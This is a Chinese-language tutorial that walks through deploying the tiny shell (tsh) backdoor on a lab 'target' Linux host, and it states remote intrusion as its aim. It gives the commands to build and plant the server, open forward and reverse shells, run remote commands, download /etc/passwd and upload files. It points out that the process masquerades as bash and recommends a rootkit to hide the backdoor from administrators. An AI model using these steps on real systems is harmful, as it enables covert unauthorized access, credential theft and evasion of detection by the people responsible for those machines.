本篇文章主要介绍在Linux系统如何使用使用tiny shell（tsh）进行远程控制和传输文件，达到远程攻击入侵的目的

一、操作目的和应用场景

（一）目的

主要介绍linux系统使用tiny shell（tsh）进行远程系统控制和远程传输文件。

（二）简介

Tiny Shell是一款开源的Unix类后门shell工具，由C语言编写，体积小（在kali系统上编译后只有55K大小)。分为客户端和服务端（后门），支持正向连接模式（即服务端在远程运行，攻击者远程直接连接）和反弹连接模式（攻击者在自己服务器监听，服务端连接攻击者机器的监听端口）

功能：

• 通信加密
• 支持上传、下载
• 正向连接和反弹shell

二、平台及工具版本

三、操作步骤

（一）下载tiny shell

首先攻击者下载tiny shell的源代码

git clone 下载地址https://github.com/orangetw/tsh

解压缩

（二）使用tiny shell进行正向连接

1、 配置

cd tsh //进入解压后的目录

vi tsh.h //编辑头文件

指针变量*secret的值是连接口令，可设置为任意字符串，这里设置为tinyshell；

SERVER_PORT指定服务端监听端口，这里设置为5555；

CONNECT_BACK_HOST和CONNECT_BACK_DELAY指定反弹连接的信息，将其注释掉；

保存退出。

2、 编译

make linux

查看编译生成的文件

tsh是客户端程序，tshd是服务端程序。

3、 部署

由于靶机和攻击者都是基于debian的衍生版系统，因此可以直接使用在攻击者本地编译的程序。对于差异比较大的系统，建议在攻击者本地和目标主机上进行相同的配置，之后分别进行编译，以得到在两个系统中都可以正常运行的可执行文件。

//将攻击者本地编译生成的tshd服务端程序复制到靶机

scp tshd user1@192.168.242.118:/home/user1

//靶机设置环境变量

//设置攻击者的shell中，用户的HOME目录为/var/tmp

HOME=/var/tmp

//设置攻击者所创建文件的权限，除了攻击者自己之外其它用户无权访问

umask 077

4、 获取远程shell

(1) 靶机启动监听

./tshd

在tsh.h头文件中默认存在一条指令：

#define FAKE_PROC_NAME "/bin/bash"

因此这里的进程名称显示为bash。

(2) 攻击者运行客户端程序

./tsh 192.168.242.118 //指定靶机IP地址

成功获取shell。

在靶机上查看进程，ps命令输出中的tsh进程显示为/bin/bash。

可看到有多个bash进程，其中PID为2181的-bash才是真正的bash，其它的都是tsh伪装的。

5、 远程执行命令

./tsh 192.168.242.118 "uname -a"

命令执行成功。

6、 文件传输

(1) 从靶机下载文件

./tsh 192.168.242.118 get /etc/passwd .

下载成功。

tsh不支持同时下载多个文件，可在靶机上先执行tar，将多个文件打包成一个文件，再用get下载。

(2) 将文件上传到靶机

echo hahaha > /tmp/file.txt //创建文件

./tsh 192.168.242.118 put /tmp/file.txt /tmp //上传到靶机

./tsh 192.168.242.118 "cat /tmp/file.txt" //查看靶机上的文件

文件上传成功。

（三）使用tiny shell获取反弹shell

1、 配置

vi tsh.h //编辑头文件，取消针对反弹连接指令的注释，并指定反弹连接的目标地址

保存退出。

2、 编译

make linux //编译

生成tsh和tshd两个可执行文件。

3、 部署

//将服务端程序文件复制到靶机

scp tshd user1@192.168.242.118:/home/user1

//靶机命令行设置umask和HOME环境变量

umask 077

HOME=/var/tmp

4、 获取反弹shell

(1) 攻击者运行客户端程序

./tsh cb //cb表示connect back

客户端程序开始监听本地端口，等待服务端连接。

(2) 靶机执行后门程序

./tshd

最多半分钟，攻击者获得反弹shell

四、参考网址

https://cloud.tencent.com/developer/article/1047029

五、注意事项

（一）tsh加密密钥的安全问题

tiny shell的流量是加密的，密钥是tsh.h文件中secret变量的值。在编译时secret变量的值被写入到可执行文件中。找到密码的方法很简单，只要使用两个不同的密码分别编译一次，再使用strings将可见字符串写入文件，再比较两个文本文件，就可以找到密码。

例如两次编译得到的可执行文件分别为tsh_1和tsh_2

密码位于文件的第487行。

应对tiny shell的可执行文件（主要是服务端）采取严格的访问控制措施，防止被其它用户访问。

（二）tsh后门文件、进程和网络连接的隐藏问题

从实验中可以看到，在靶机上，tshd后门文件、进程以及网络连接信息，通过ls、ps、netstat命令都可以查看到，因此该后门是很容易被管理员发现的。建议在运行tsh的同时结合rootkit对其进行隐藏

Tags：linux远程复制